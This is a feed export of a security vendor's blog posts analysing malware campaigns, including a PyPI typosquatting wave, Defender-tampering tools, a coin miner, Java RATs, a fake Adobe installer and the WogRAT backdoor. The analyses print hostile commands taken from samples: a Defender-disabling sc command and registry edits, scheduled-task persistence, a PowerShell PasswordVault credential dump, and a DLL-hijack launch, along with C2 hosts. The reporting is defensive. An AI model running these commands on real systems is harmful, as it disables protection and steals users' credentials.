Malware Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/malware/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Tue, 02 Apr 2024 01:20:04 +0000 en-US hourly 1 https://wordpress.org/?v=81943 200474804 PyPI Malware Spreading Outbreak Exploits Typosquatting https://gridinsoft.com/blogs/pypi-malware-outbreak/ https://gridinsoft.com/blogs/pypi-malware-outbreak/#respond Fri, 29 Mar 2024 17:04:58 +0000 https://gridinsoft.com/blogs/?p=20871 PyPI, an index of Python packages, once again became a place for malware spreading. Threat actors registered hundreds of profiles to deploy packages, with the name set as typosquatting to known and popular packages. This forced the administration to halt new user registration until the issue is resolved. PyPI Malware Spreading Causes Registrations Halt Python… Continue reading PyPI Malware Spreading Outbreak Exploits Typosquatting

The post PyPI Malware Spreading Outbreak Exploits Typosquatting appeared first on Gridinsoft Blog.

]]>
PyPI, an index of Python packages, once again became a place for malware spreading. Threat actors registered hundreds of profiles to deploy packages, with the name set as typosquatting to known and popular packages. This forced the administration to halt new user registration until the issue is resolved.

PyPI Malware Spreading Causes Registrations Halt

Python Package Index, commonly known as PyPI, closes the registration of new users due to the wave of malware spreading through the platform. Such trouble is nothing new, as similar infestations happened in the past. Each time in the past the platform was implementing changes targeted on prevention of malware uploading in future, but the protection likely failed this time. The research from CheckPoint uncovers the entire flow of the attack.

Under the latest attack course, cybercriminals uploaded not the final payload, but a malicious script that further loads the malware. Exact repositories with these scripts were generally uploaded on March 27, with user accounts created the day before. Overall, the research unveils 576 malignant repositories.

Malicious user profile PyPI
PyPI user profile that uploaded malware. Source: CheckPoint

Another thing that unites all these uploads is the use of typosquatting in their naming. Frauds were purportedly aiming at spoofing the names of popular packages. They particularly used symbol-numeric substitution (request5 instead of requests), popular typos (requestss) and slight changes like -sdk or -v1 endings. While looking as obvious fakes, they may still work out when users are in haste or distracted.

Package indexes for different programming languages are often a target of cybercriminals’ attention. Ones of the size of PyPI, which boasts of over 800,000 users, are literally Mekkas for hackers. By spreading malware in packages, they can infect both users and developers, potentially gaining a starting point for a cyberattack on a corporation, or even for a supply chain attack. Considering the wide use of Python in machine learning, this can also be leveraged for attacks on ML clusters. The latter appears to be a new point of interest for cybercriminals.

Malware in PyPI: How It Works?

Despite the scale of the attack, the way the attack works is nothing special. As I’ve said, malicious repositories contained not the exact malware, but an obfuscated loader script. The latter invoked the connection to the command server – funcaptcha[.]ru – and pulled the payload.

All the repos were spreading the same script, which deployed the same malware, regardless of the region. Those were an infostealer malware and a cryptojacker, both in a form of obfuscated code. None of them, however, belong to any of the known malware families, likely being developed for this specific attack campaign.

Infostealer PyPI
Piece of code of the infostealer malware. spread in this campaign

Infostealer targets passwords stored in browser files and session tokens of popular desktop applications. Additionally, it grabs browser cookies – another valuable source of user information. Cryptojacking malware modifies the desktop crypto wallets it detects, so they most likely change the recipient of all transactions to the frauds’ wallet. Following the action, both malware samples communicate the same C2 server as the loader script did.

Disclosure and Remediation

Shortly after uncovering the attack chain, PyPI administrators claimed the suspension of all new user registration. Consequently, they started searching for exact repositories and deleting them, which corresponds to the tactics they used before. Still, this does not solve the problem of exclusively reactive actions towards such threats.

Despite being well-known and trusted, all large package repositories suffer from the very same problem. It is too hard to track all the uploads, and strict premoderation will queue the new packages for weeks. The only variable here is which one will be the next to get the attention of adversaries. This eventually raises the question of self-defense from the developers who rely on these repos in daily tasks.

An obvious advice here is to double-check all the packages, regardless of their source. Malware receives more and more sophisticated disguises, becoming effective even against savvy and aware users. A good anti-malware software will be on hand as well: a proper one will easily detect and prevent the execution of a malicious script before it starts its mischievous job.

PyPI Malware Spreading Outbreak Exploits Typosquatting

The post PyPI Malware Spreading Outbreak Exploits Typosquatting appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/pypi-malware-outbreak/feed/ 0 20871
VirTool:Win32/DefenderTamperingRestore https://gridinsoft.com/blogs/virtoolwin32-defendertamperingrestore/ https://gridinsoft.com/blogs/virtoolwin32-defendertamperingrestore/#respond Mon, 25 Mar 2024 23:29:53 +0000 https://gridinsoft.com/blogs/?p=20711 VirTool:Win32/DefenderTamperingRestore is the name of the Microsoft Defender detection of a malicious element present in the system. Usually, it marks a thing that can weaken the system security and make the device vulnerable to malware injection. Let’s find out how dangerous this is, and how to deal with it. Threats like VirTool are often the… Continue reading VirTool:Win32/DefenderTamperingRestore

The post VirTool:Win32/DefenderTamperingRestore appeared first on Gridinsoft Blog.

]]>
VirTool:Win32/DefenderTamperingRestore is the name of the Microsoft Defender detection of a malicious element present in the system. Usually, it marks a thing that can weaken the system security and make the device vulnerable to malware injection. Let’s find out how dangerous this is, and how to deal with it.

Threats like VirTool are often the sign of an ongoing malware attack. Threats may carry embedded code that targets security tools, as well as use a stand-alone script. The fact that malicious software tries to disable antivirus tools usually means that its activities are hard to conceal, i.e. it is something harsh and severe. Ransomware, desktop blockers, vandal viruses, coin miners – all of them can make use of a defenceless system.

Protect your computer with a persistent, threat-resistant antimalware tool! GridinSoft Anti-Malware will defend your system any time, in any circumstances, by your mere command. 👉🏻 Get yourself reliable protection

What is VirTool:Win32/DefenderTamperingRestore?

VirTool:Win32/DefenderTamperingRestore detection points at a malignant element that can prevent Microsoft Defender from working properly. This can include various scripts, ones that modify registry keys that control the functioning of Defender. It is also triggered when you are trying to run scripts or download programs designed to subvert system defenses. As I said, VirTool is hidden from the user and runs in the background. This makes malware detection and removal more difficult.

VirTool:Win32/DefenderTamperingRestore - Detection

Also, pirated software can contain part of code that modifies system settings to bypass license restrictions but does not carry malicious functionality. Pirated software may also include scripts that disable Microsoft Defender to prevent malicious components from being detected and removed.

Is VirTool:Win32/DefenderTamperingRestore false positive?

Although VirTool:Win32/DefenderTamperingRestore usually indicates the presence of malicious activity, in some cases it may be the result of a false positive detection. This can happen if legitimate software or administrative scripts change security settings during standard operation or system maintenance.

complains for false positive
Users are complaining about false positives

VirTool:Win32/DefenderTamperingRestore sometimes also appears in scenarios involving the use of Microsoft Safety Scanner (MSERT), which can identify and report changed settings as part of its scan, correcting them back to safer configurations.

DefenderTamperingRestore Analysis

As I said above, it specializes in modifying registry keys to disable Microsoft Defender, or restrict its capabilities. This is mainly done through PowerShell or Command Prompt commands that modify system policies and specific Defender settings.

One particular thing that quite a few VirTool:Win32/DefenderTamperingRestore samples do is modify the registry entries responsible for real-time and heuristic protection. Malware particularly goes for the “DisableRealtimeMonitoring” key to disable real-time protection or modify “DisableBehaviorMonitoring” to stop tracking suspicious activity.

Walking Through Affected Registry Keys

Among the main targets of VirTool is to disable Defender completely. Malware creates the “DisableAntiSpyware” parameter, setting its value to 1, which stops Defender from running.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

To disable proactive protection, VirTool creates another key – “DisableRealtimeMonitoring” – and sets it to 1. This stops the security tools from continuous scanning of all the accessed folders and launched files.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection

A less often trick that thing pulls targets the automatic sample submission system. By setting the 1 value to the DontReportInfectionInformation entry in the following registry hive, it disables sending samples to Microsoft.

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet

Some of the things that Microsoft detects with this name reach a sky-high level of tricks with Windows commands. A confusing set of meaningless letters and symbols you can see below is in fact rather useful. It sets certain folders – particularly ones that malware uses – to the whitelist of Microsoft Defender. Several ransomware samples use same or similar commands during gaining persistence.

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

In rare cases, VirTool acted as a loader, downloading and executing additional malicious modules. It modified “Shell” and “Userinit” registry keys to execute malicious scripts at system startup. Though a much more common occasion is this malicious element being embedded into a more complex script. The latter typically orchestrates the initial malware injection, where disabling Microsoft Defender is a rather obvious preliminary step.

How to Remove VirTool:Win32/DefenderTamperingRestore?

The appearance of VirTool:Win32/DefenderTamperingRestore is usually a bad omen. It is likely a sign of malware activity that goes below the radar. For that case, I recommend following these steps:

1. Restart your computer into Safe Mode with Networking

Open Start menu, then click the “Reboot” button while holding the Shift key. The Troubleshooting menu will appear, select here “Troubleshoot” → “Startup Settings” and click “Restart”. This sends you to the window with Safe Mode options.

There, click on the 5 button to launch the Safe Mode with Networking. This mode stops all non-essential processes from launching, leaving you with bare Windows and network connectivity features enabled. By doing so, you restrict malware from running, making the removal much easier to accomplish.

2. Run reliable antivirus software

Download a reliable antivirus software that can remove VirTool remnants permanently from your PC. GridinSoft Anti-Malware is an excellent option for this. Run a Full Scan and remove any detected threats.

VirTool:Win32/DefenderTamperingRestore

The post VirTool:Win32/DefenderTamperingRestore appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/virtoolwin32-defendertamperingrestore/feed/ 0 20711
Hellminer.exe Coin Miner https://gridinsoft.com/blogs/hellminer-exe-malware-analysis/ https://gridinsoft.com/blogs/hellminer-exe-malware-analysis/#respond Fri, 22 Mar 2024 15:51:29 +0000 https://gridinsoft.com/blogs/?p=20683 Hellminer.exe is a process you can see in the Task Manager that indicates a malicious software activity. It stands out by the high CPU load it creates, making the system much less responsive. Let’s figure out what this process is, and how to get rid of it. Hellminer malware has a potential to attack a… Continue reading Hellminer.exe Coin Miner

The post Hellminer.exe Coin Miner appeared first on Gridinsoft Blog.

]]>
Hellminer.exe is a process you can see in the Task Manager that indicates a malicious software activity. It stands out by the high CPU load it creates, making the system much less responsive. Let’s figure out what this process is, and how to get rid of it.

Hellminer malware has a potential to attack a wide range of devices, from IoT to server clusters. The final target of its activity is bringing profit to its masters with the use of your hardware. Ignoring the activity of this malicious program may lead to premature hardware failure and overall performance deterioration.

Modern malware samples often come in packs, meaning that one thing may signify the presence of several others. Do not hesitate with removal: scan your device with GridinSoft Anti-Malware and remove all the threats in one click. 👉🏼 Get your system cleaned up.

What is the Hellminer.exe process?

This is a process associated with a malicious coin miner. Such malware aims at exploiting the system’s hardware to mine cryptocurrencies, mainly DarkCoin and Monero. To maximize profits, hackers who stand behind this malware establish huge networks of infected computers. Hellminer takes up to 80% of CPU power in order to get substantial mining performance, making the system sluggish and uncomfortable to use.

Hellminer process Task Manager
Hellminer.exe process in Task Manager

Malicious miners like this one typically get into the user systems through malvertising on the Web, or with the use of dropper malware. Both spreading ways though are commonly used by other malware, which means the risk that Hellminer is not the only infection running in the system.

This malware appears to be different from other miners, as it is not based on XMRig, a popular open-source mining software. Instead, it appears to be written in Python, and is likely a private development. Let’s check out other interesting stuff I’ve found during the analysis.

Hellminer Malware Analysis

It is not completely clear how Hellminer gets into the system; I suspect it is not much different from how malware miners typically spread – via dropper malware and malvertising. After the launch, the malware begins with a selection of anti-VM and anti-debug checks.

Hellminer Execution chain

Using the calls to WMI, it gets the info about the CPU, trying to find any signs of virtualization. Why I don’t think it is just an immediate info gathering is because the very next step is listing the services and processes. Hellminer specifically seeks for traces of the VMWare virtualization environment. After these checks, the main payload is unfolded. Though, malware may as well use the info collected at this stage, to configure the mining process or as a part of the system fingerprint.

wmic cpu get Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer /format:list

Fingerprinting starts with another call to WMIC, wmic os get Version. Malware attempts to receive quite a basic, if not scarce, set of data – just the info about the operating system. After that, malware gains persistence through the manipulation with another command and series of changes in Windows registry.

%windir%\System32\svchost.exe -k WerSvcGroup – starting Windows error reporting service to make it run the malware. This increases the level of privileges the malicious program has, also providing it with a disguise.

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security – changing network security policies.

The final round of persistence involves another call to WMI, specifically to its Adaptation Service. Hellminer forces it to recursively launch the payload, ensuring continuous execution. This specific command is also a part of resource allocation for the mining process.

wmiadap.exe /F /T /R

Command Server Connectivity

Same as other malware miners, Hellminer does not have any extensive C2 communication. After finishing the steps from the above, it sends the blob of system information to the command server, effectively notifying it about the readiness. C2 returns the configuration file, which specifies the mining pool and the IP address to connect to.

Still, there is a thing that catches an eye – the form of command servers used by this malware. They do not look like C2 of a classic model, instead being a peer-to-peer one. In such a network, the role of a command server is given to one of the infected computers. “Real” server sporadically communicates with one, retrieving the information about the new devices and assigning the next system to get the C2 role. This drastically increases the sustainability of the network, making it particularly hard to disrupt through the command server disruption.

During the analysis, I’ve detected these command servers:

  • 20.99.184.37:443
  • 20.99.186.246:443
  • 23.216.147.64:443
  • 192.229.211.108:80
  • 20.99.133.109:443

Hellminer.exe Removal Guide

Removing Hellminer malware requires anti-malware software scanning. Such threats typically duplicate itselves to numerous folders across the system, with each acting as a backup. GridinSoft Anti-Malware is what would remove the malicious miner and all its copies in the matter of minutes. Launch a Full Scan, and let it finish – this will make sure your system is as good as new.

Hellminer.exe Coin Miner

Miner malware activity always correlates with cryptocurrency prices. At the moment, they are on the rise, meaning that more and more frauds will opt for this malware. The typical ways of spreading for malicious miners is malvertising, particularly ones in search engines. Avoiding it requires user attention: they typically mimic legitimate sites that spread freeware, but always have a different, mangled URL.

The post Hellminer.exe Coin Miner appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/hellminer-exe-malware-analysis/feed/ 0 20683
STRRAT and Vcurms Malware Abuse GitHub for Spreading https://gridinsoft.com/blogs/strrat-and-vcurms-abuse-github/ https://gridinsoft.com/blogs/strrat-and-vcurms-abuse-github/#respond Fri, 22 Mar 2024 12:04:00 +0000 https://gridinsoft.com/blogs/?p=20629 A new phishing campaign has recently been discovered that uses GitHub to deliver Remote Access Trojans (RAT) STRRAT and Vcurms via a malicious Java downloader. ANY.RUN specialists have detected the active spread of these malicious programs and warn users against potential threats. Short About STRRAT and Vcurms STRRAT is a Java-based RAT, notorious for its… Continue reading STRRAT and Vcurms Malware Abuse GitHub for Spreading

The post STRRAT and Vcurms Malware Abuse GitHub for Spreading appeared first on Gridinsoft Blog.

]]>
A new phishing campaign has recently been discovered that uses GitHub to deliver Remote Access Trojans (RAT) STRRAT and Vcurms via a malicious Java downloader. ANY.RUN specialists have detected the active spread of these malicious programs and warn users against potential threats.

Short About STRRAT and Vcurms

STRRAT is a Java-based RAT, notorious for its ability to steal information. It’s primarily used to gather credentials from browsers and email clients, log keystrokes, and provide backdoor access to infected systems. Same as other remote access trojans, STRRAT also relies on stealthiness of its operations and detection evasion.

malicious attachment
Phishing email with a pop-up notification regarding launching the JAR file

Vcurms, is another Java-based RAT, but with distinct operational tactics. It communicates with its command-and-control server via a Proton Mail email address and executes commands received through specific email subject lines. This malware carries the functionality of infostealer, capable of extracting data from various applications like Discord and Steam. Aside from this, it can grab credentials, cookies, and autofill data from multiple web browsers. It shares similarities with another malware known as Rude Stealer.

Attack Overview

ANY.RUN researchers say the attack begins with a phishing email convincing recipients to click a button to verify payment information. This action leads to the download of a malicious JAR file masquerading as a payment receipt. The downloaded file then launches two additional JAR files that activate both Vcurms and STRRAT trojans.

Infection chain of malware

Both malware samples try to remain stealthy, using detection and analysis evasion techniques. Researchers found them using these specific tricks:

  • Using legitimate services and tools – when attackers can use legitimate cloud platforms such as AWS and GitHub to store or distribute malware. Such a trick also complicates filtering network requests of malicious origin.
  • Code Obfuscation – in which the source code of a program is converted into a form that makes it difficult to read. This is used to hide malicious functions from antivirus scanners and analysts. (By the way, the first JAR file received via email is obfuscated and downloads malware using a PowerShell command).
  • Packing – where malicious code is compressed or “packed” together with some type of unpacking mechanism. This makes it difficult to analyze the code without executing the malware.

This is not the first time malware actors abuse GitHub or other developer platforms. Unfortunately, there are not a lot of options to mitigate this proactively: it is easy to masquerade the code and make it look innocent. GitLab administrators reacted to user complaints and removed the malicious repository, but this does not guarantee that there won’t be a comeback.

Sandbox attack analysis

A phishing campaign begins by spreading the initial loader via phishing emails. The goal of these emails is to convince the user to download and run a malicious JAR file. This file acts as a primary loader that initiates a series of malicious actions on the infected machine.

Primary Loader

Once launched, the primary loader downloads a secondary malicious file from the aforementioned repository on GitHub. The file is launched using a command pointing to the Java file execution:

"C:\Program Files\Java\jre1.8.0_271\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\64e8cb522a3a4664791c27512d94a911bc2fbcbae09b625976ff8ac6809819d3.jar"

Persistence and disguise

Then, malware creates a copy of itself in the AppData\Roaming directory and registers a task in the Windows scheduler to automatically restart every 30 minutes. Interestingly enough, malware tries to mimic the Skype application, judging by the name of the task it creates. This ensures the permanence of the malware on the system.

cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr "C:\Users\admin\AppData\Roaming\64e8cb522a3a4664791c27512d94a911bc2fbcbae09b625976ff8ac6809819d3.jar"

Collecting information about the system

Next, the malware gathers information about the system, including a list of disks and the presence of installed security programs, using the following commands:

cmd.exe /c "wmic /node:. /namespace:'\\root\cimv2' path win32_logicaldisk get volumeserialnumber /format:list"
cmd.exe /c "wmic /node:localhost /namespace:'\\root\securitycenter2' path antivirusproduct get displayname /format:list"

One of the malware programs, in this case Vcurms, uses PowerShell command to dump the passwords kept in Windows, rather than in the third party tool. Obviously, it gathers data from browsers, too, but in a different manner – by accessing their data directly.

powershell.exe "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }"

I assume this command is related to Vcurms as STRRAT does not exhibit password stealing functionality.

Strengthening cybersecurity

This case shows vigilance and cooperation in cybersecurity. This phishing attack showed that even trusted platforms like GitHub can be used as a tool to spread malware. Cybersecurity experts offer the following tips to protect against such threats:

  • Firstly, always verify the sender and avoid opening attachments or clicking on links in emails that seem suspicious or unexpected. If an email asks you to confirm payment details or personal information, it is better to contact the sender directly through another channel.
  • Then, enable spam filters on your email to reduce the number of phishing and junk emails reaching your inbox.
  • Make sure your antivirus software and all systems are updated to the latest versions. Regular updates help protect against known threats and vulnerabilities.
  • Also, regularly monitor systems for suspicious activity and respond quickly to cybersecurity incidents. Use analytics and intelligent detection tools.
  • And last, back up important data regularly and store it in a safe place. This will help you recover information in the event of a successful attack.

STRRAT and Vcurms Malware Abuse GitHub for Spreading

The post STRRAT and Vcurms Malware Abuse GitHub for Spreading appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/strrat-and-vcurms-abuse-github/feed/ 0 20629
Adobe Reader Infostealer Plagues Email Messages in Brazil https://gridinsoft.com/blogs/adobe-reader-infostealer-targets-brazil/ https://gridinsoft.com/blogs/adobe-reader-infostealer-targets-brazil/#respond Tue, 12 Mar 2024 19:26:13 +0000 https://gridinsoft.com/blogs/?p=20329 A recent email spam campaign reportedly spreads infostealer malware under the guise of Adobe Reader Installer. Within a forged PDF document, there is a request to install Adobe Reader app, that triggers malware downloading and installation. Considering the language of the said documents, this malicious activity mainly targets Portugal and Brazil. Infostealer Spreads in Fake… Continue reading Adobe Reader Infostealer Plagues Email Messages in Brazil

The post Adobe Reader Infostealer Plagues Email Messages in Brazil appeared first on Gridinsoft Blog.

]]>
A recent email spam campaign reportedly spreads infostealer malware under the guise of Adobe Reader Installer. Within a forged PDF document, there is a request to install Adobe Reader app, that triggers malware downloading and installation. Considering the language of the said documents, this malicious activity mainly targets Portugal and Brazil.

Infostealer Spreads in Fake Adobe Reader Installers

The recent attack campaign detected by ASEC Intelligence Center starts with email spam. The messages have a PDF file attached to them, with their contents in Portuguese. This seriously narrows down the list of countries the campaign is targeting – to Brazil and Portugal. Inside of the file, there is a pop-up prompt to install Adobe Reader, which is allegedly required to open the document. Short side note – modern web browsers can handle PDFs of any complexity with ease.

Following the instruction of a document triggers the downloading of a file named Reader_Install_Setup.exe, which obviously mimics a legit installation file of the program. It even repeats the icon, which makes the fraud even harder to understand at this stage. Running the thing, which in fact is a loader, initiates the malware execution.

Fake Adobe Reader installer

However, it does not happen instantly – malware performs a series of actions to pull the DLL hijack and run the final payload with the max privileges possible. First, it spawns an executable file and drops a DLL that contains actual payload and runs the msdt.exe process. The latter is a genuine Windows diagnostics tool that malware uses to call for a subordinate service.

C:\Windows\SysWOW64\msdt.exe" -path "C:\WINDOWS\diagnotics\index\BluetoothDiagnostic.xml" -skip yes – code used to call for MSDT, specifically its Bluetooth Diagnostic tool

This service will consequently load a malicious DLL I’ve mentioned above. The library, in turn, runs the said executable file, legitimizing the infostealer and providing it with max privileges.

Stealer Malware Analysis

Even though the malware used in the campaign appears to be unique and does not belong to any of the known malware families, its functionality can barely be called unusual. This infostealer gathers basic info about the system, sends it to the command server and then creates a directory to store the collected data. Malware adds the latter to the list of Microsoft Defender exclusions, so it will not disrupt its operations. Also, it mimics the legit Chrome folder by adding a fake executable file and also some of the files typical for a genuine browser folder.

Browser folder copy infostealer
A fake browser folder created by the infostealer to keep the collected data

The C2 servers used by some of the samples confirms the attack targeting hypotheses I’ve mentioned above. Hxxps://thinkforce.com[.]br/ and hxxps://blamefade.com[.]br/ receive the AutoFill data from all the browsers. While this is less than what modern infostealers typically gather, it is still sensible – browsers keep almost all of our passwords.

How to protect against infostealer malware?

Information stealers never were an underdog of the malware world, and they remain a potent threat regardless of the circumstances. However, even though their samples may feature outstanding anti-detection tricks, they still need to get in. And this is where you can avoid them with max efficiency.

Be careful with emails. Email spam is probably going to be the most widespread malware delivery way of this decade. Users tend to believe their content or simply ignore the related risks, which inevitably leads to malware infection. Seeing such a sketchy offer to install a long-forgotten app or perform an action that is not normally needed with this type of documents should raise suspicion. At the same time, texts of such messages may be ridiculous enough to make the fraud apparent.

Use official software sources. It happens for certain files to require specific software, but try to use only official distributions of one. Going to the developer’s site and downloading one is not that longer when compared to clicking a link.

Have decent anti-malware software on hand. Malware finds new spreading ways pretty much every day. To avoid falling victim to the most tricky sample, a software that will not allow it to get in is essential. GridinSoft Anti-Malware is a program that will provide you with real-time protection and network filters with hourly updates. This security tool will make sure that malware will not even launch in the first place.

Adobe Reader Infostealer Plagues Email Messages in Brazil

The post Adobe Reader Infostealer Plagues Email Messages in Brazil appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/adobe-reader-infostealer-targets-brazil/feed/ 0 20329
WingsOfGod.dll – WogRAT Malware Analysis & Removal https://gridinsoft.com/blogs/wograt-wingsofgod-analysis-removal/ https://gridinsoft.com/blogs/wograt-wingsofgod-analysis-removal/#respond Fri, 08 Mar 2024 17:17:12 +0000 https://gridinsoft.com/blogs/?p=20264 WogRAT, also known as WingsOfGod RAT, is a novice remote access trojan that attacks users from Asian countries. Named after its own file – Wingsofgod.dll, this malware attacks people since late 2022, spreading through the online notepad service. What is WogRAT (WingsOfGod.dll)? WogRAT is a classic example of a remote access trojan, a backdoor-like malicious… Continue reading WingsOfGod.dll – WogRAT Malware Analysis & Removal

The post WingsOfGod.dll – WogRAT Malware Analysis & Removal appeared first on Gridinsoft Blog.

]]>
WogRAT, also known as WingsOfGod RAT, is a novice remote access trojan that attacks users from Asian countries. Named after its own file – Wingsofgod.dll, this malware attacks people since late 2022, spreading through the online notepad service.

What is WogRAT (WingsOfGod.dll)?

WogRAT is a classic example of a remote access trojan, a backdoor-like malicious program that focuses on providing remote access to the infected system. ASEC researchers were first to detect and track the malware campaign. They additionally emphasize that this malicious program primarily targets Asian countries – China, Japan, Singapore and Hong Kong in the first place.

The strange thing about WogRAT is that its spreading campaigns were not detected, even though some of the methods were explained in the original research. Malware (more specifically – its loader) is disguised as a file posted on an online notepad service. Its naming supposes that frauds offer WogRAT as a system/program tweaking utility of some sort. This, in turn, supposes that initial spreading of the malware happens in “closed” places, like chats in messengers or the like.

Encoded strings aNotepad
Encoded strings stored in aNotepad

Names for malware loader files that are available from aNotepad:

BrowserFixup.exe, ChromeFixup.exe, WindowsApp.exe, WindowsTool.exe, HttpDownload.exe, ToolKit.exe, flashsetup_LL3gjJ7.exe

WogRAT Malware Technical Analysis

As I said, the original downloading from the aNotepad site gets only the malware loader in the encoded form. Upon execution, it compiles itself on the run and requests the actual payload from a different page hosted on the same site. Depending on the attack, the source for the second-stage payload may differ.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\Users\\AppData\Local\Temp\RESF175.tmp c:\Users\\AppData\Local\Temp\2jahfobn\CSC51D40ACB8B5440B2A46FD286719924C.TMP – the command used by the loader to compile itself

The downloaded file is a similar .NET assembly, encoded with Base64 and present as a text string on the source website. Loader decrypts the payload and loads it into the memory using process hollowing technique.

C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 2068

Upon startup, WogRAT collects basic system information by checking different registry keys and executing commands. In particular, it gathers info about network connections, system version, username and some of the info regarding system policies. Malware stacks this data with the info of its own process and sends it to the command server in the HTTP POST request. After that, malware switches to idle, waiting for the commands.

act=on&bid=4844-1708721090438&name=System1\User1

WogRAT has a rather interesting set of commands and properties that it is expecting to receive. The simplified formula consists of 3 elements, and looks like this:

Element Value and purpose
task_id=%id% text value, corresponds to the task
task_type=%type% numeric value, corresponds to the action
task_data=%data% Path to the file that the task should be applied to (URL for downloads)

The resulting command is like the following:

task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts

This malware supports 5 different types of operations: running specific files, downloading or uploading the files, altering the idle time, and terminating the execution. Not a huge list at the first glance, but in combination with different task types this gives a full-fledged backdoor functionality.

How to remove WogRAT?

WogRAT is not the stealthiest malware out there; it is in fact more reliant on the tricky spreading method and double-staged loader. Still, the amount of hooks it creates in the system makes it particularly hard to remove manually. For that reason, I recommend using GridinSoft Anti-Malware: a full scan with that program will be enough to repel the RAT and all of its parts across the system.

WingsOfGod.dll – WogRAT Malware Analysis & Removal

The post WingsOfGod.dll – WogRAT Malware Analysis & Removal appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/wograt-wingsofgod-analysis-removal/feed/ 0 20264
rsEngineSvc.exe Process: Reason Core Security Engine Service https://gridinsoft.com/blogs/rsenginesvc-exe-process-remove/ https://gridinsoft.com/blogs/rsenginesvc-exe-process-remove/#respond Wed, 28 Feb 2024 15:36:46 +0000 https://gridinsoft.com/blogs/?p=20003 RsEngineSvc.exe is an executable file associated with RAV Antivirus, a program developed by ReasonLabs. While being less dangerous than malware, it may be categorized as PUP (Potentially Unwanted Program). This kind of software is usually bundled with other free applications and installed without the user’s knowledge or distributed through deceptive advertising. Is Rsenginesvc.exe Virus? As… Continue reading rsEngineSvc.exe Process: Reason Core Security Engine Service

The post rsEngineSvc.exe Process: Reason Core Security Engine Service appeared first on Gridinsoft Blog.

]]>
RsEngineSvc.exe is an executable file associated with RAV Antivirus, a program developed by ReasonLabs. While being less dangerous than malware, it may be categorized as PUP (Potentially Unwanted Program). This kind of software is usually bundled with other free applications and installed without the user’s knowledge or distributed through deceptive advertising.

Is Rsenginesvc.exe Virus?

As I wrote above, rsEngineSvc.exe process is a part of RAV Antivirus (Reason Core Security Engine Service). It is a program from ReasonLabs and supposedly serves to protect against viruses and various threats. In fact, RAV Antivirus appears when the user clicks on a malicious link or installs a cracked program.

rsEngineSvc.exe
RAV Antivitus main interface

Normally, rsEngineSvc.exe should not cause any significant troubles. Nonetheless, its appearance is barely a desired thing for the user. The behavior of this “antivirus” is also obtrusive, with pop-ups and startup scans that you cannot disable. This, combined with higher-than-usual resource consumption, should be a good reason to remove rsEngineSvc from your computer.

RsEngineSvc.exe High CPU and Disk Usage Explained

Typically for any antivirus, RAV, that contains the rsEngineSvc.exe will perform scanning operations. During this routine, it is natural for most antiviruses to use CPU power and create a sensible disk load. However, due to the lackluster development, rsEngineSvc.exe (Reason Core Security Engine Service) is much less efficient, which leads to excessive usage of system resources.

RAV Antivirus in Task Manager
rsEngineSvc.exe process in Task Manager

The problem is particularly sensible for the systems with hard disk drives. HDDs are typically slower, slow enough to be overloaded by a single program that uses one intensively. Such discomfort, combined with less than controllable behavior is yet another reason to remove rsEngineSvc.

It is important to emphasize that the load created by rsEngineSvc.exe is not malicious, e.g. it does not mine cryptocurrencies or performs other illegal activities at your expense.

Can I delete or uninstall rsEngineSvc.exe?

To remove rsEngineSvc.exe from your system, I’d recommend Gridinsoft Anti-Malware. Since RAV Antivirus commonly arrives bundled with other programs, it is expected that your system to be flooded by other PUAs. And to get your system clean from any unwanted programs, using proper anti-malware software is essential.

rsEngineSvc.exe Process: Reason Core Security Engine Service

How do you prevent rsEngineSvc.exe or other PUPs from installing?

To prevent the installation of rsenginesvc.exe or other potentially unwanted programs (PUPs), you need to be careful when downloading and installing freeware from the Internet. Additionally, exercise caution when visiting suspicious websites and opening malicious emails.
Here are some tips to help you protect your computer from PUPs:

  • Use a reliable antivirus software such as Gridinsoft Anti-Malware and update it regularly. This will help you detect and remove PUPs if they get on your system.
  • Be careful when visiting unknown or suspicious websites and do not click on pop-ups, banners, or links that may lead to PUP download.
  • Be careful when downloading and installing freeware from unreliable sources, and always choose custom or advanced installation mode to decline additional offers or PUPs. Some programs may install other programs along with themselves without your consent or knowledge, so it is important to read all terms and agreements before installing any software.

The post rsEngineSvc.exe Process: Reason Core Security Engine Service appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/rsenginesvc-exe-process-remove/feed/ 0 20003
